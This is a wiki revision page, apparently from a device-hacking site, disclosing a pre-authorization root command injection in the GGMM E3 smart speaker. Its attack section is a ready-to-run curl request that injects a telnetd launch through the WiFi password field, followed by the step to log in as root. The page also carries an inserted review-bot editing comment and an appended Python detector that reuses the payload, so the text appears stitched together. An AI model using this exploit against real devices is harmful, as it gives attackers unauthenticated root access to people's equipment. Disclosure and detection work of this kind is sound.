Difference between revisions of "GGMM E3 Smart Speaker"

From Exploitee.rs
(Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:IOT =GGMM E3 Smart Speaker= "Enjoy the full rich sound by wirelessly streaming your favirote mu...")
 
 
(2 intermediate revisions by 2 users not shown)
Line 10: Line 10:
== Purchase ==
== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA Purchase the GGMM E3 Smart Speaker at Amazon]
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]


==Pre Auth Root Command Injection==
==Pre-Authorization Root Command Injection==


Target: /httpapi.asp
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.


Proof of Concept:
<pre style="white-space: pre-wrap;">
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
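Review bot: the new description that replaces the "Target: /httpapi.asp" line does not carry the endpoint over, so the affected handler is now named only inside the curl URL. Suggest keeping /httpapi.asp in the prose and naming the injected field (pwd= in the wlanConnectApEx command), since the text says only that "the WiFi password" reaches a command line utility. The Amazon link in the Purchase section also picks up search-session parameters (ref=, qid=, sr=) next to the tag; trimming it to the product URL plus the tag would keep the link stable.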
Line 21: Line 22:


Connect to the telnet service as root
Connect to the telnet service as root
=== Demo ===
{{#ev:youtube|rxtb88qYanI}}

Latest revision as of 00:44, 11 August 2017

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."

GGMM E3 Smart Speaker

"Enjoy the full rich sound by wirelessly streaming your favorite music to GGMM E3. E3 uses Wi-Fi/Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.

Purchase the GGMM E3 Smart Speaker at Amazon

Pre-Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application: the WiFi password is passed directly to a command line utility. A single curl request is enough to spawn a telnet shell as the root user, with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed

Connect to the telnet service as root
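
A defender-side check for the flaw described above, as an added example that is not part of the original page or the vendor's firmware: it parses the command= body format seen in the proof of concept and flags wlanConnectApEx requests whose fields carry anything outside the expected characters. It assumes ssid and pwd are hex-encoded (inferred from the sample values 636A32 and 3132333435363738); parse_command and check_request are illustrative names.

```python
import re
from urllib.parse import unquote_plus

# Assumption: ssid and pwd are hex-encoded ASCII, as the page's sample values suggest.
HEX_FIELDS = {"ssid", "pwd"}
HEX_ONLY = re.compile(r"[0-9A-Fa-f]*")
SHELL_META = set(";|&`$()<>\\'\"\n")


def parse_command(body):
    """Split a form body 'command=verb:k=v:k=v' into (verb, {k: v})."""
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if name == "command":
            # Decode first so %3B and similar escapes are checked in decoded form.
            verb, _, rest = unquote_plus(value).partition(":")
            fields = dict(p.partition("=")[::2] for p in rest.split(":") if p)
            return verb, fields
    return None, {}


def check_request(body):
    """Return findings for a wlanConnectApEx body; an empty list means clean."""
    verb, fields = parse_command(body)
    findings = []
    if verb != "wlanConnectApEx":
        return findings
    for key, value in fields.items():
        if key in HEX_FIELDS and not HEX_ONLY.fullmatch(value):
            findings.append(f"{key}: not hex-only")
        # Keys are checked too: a ':' inside a value shifts its tail into a key.
        if SHELL_META & set(key + value):
            findings.append(f"{key}: shell metacharacter")
    return findings


# Request bodies: the first is constructed, the second is the page's PoC body.
CLEAN = ("command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:"
         "pwd=3132333435363738:chext=0")
POC = ("command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:"
       "pwd=3132333435363738;/usr/sbin/telnetd;:chext=0")

if __name__ == "__main__":
    for body in (CLEAN, POC):
        print(check_request(body) or "ok")
```

The same allow-list check belongs in the device's request handler before the value reaches any command line; on the network side it can run over captured or proxied request bodies.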

Demo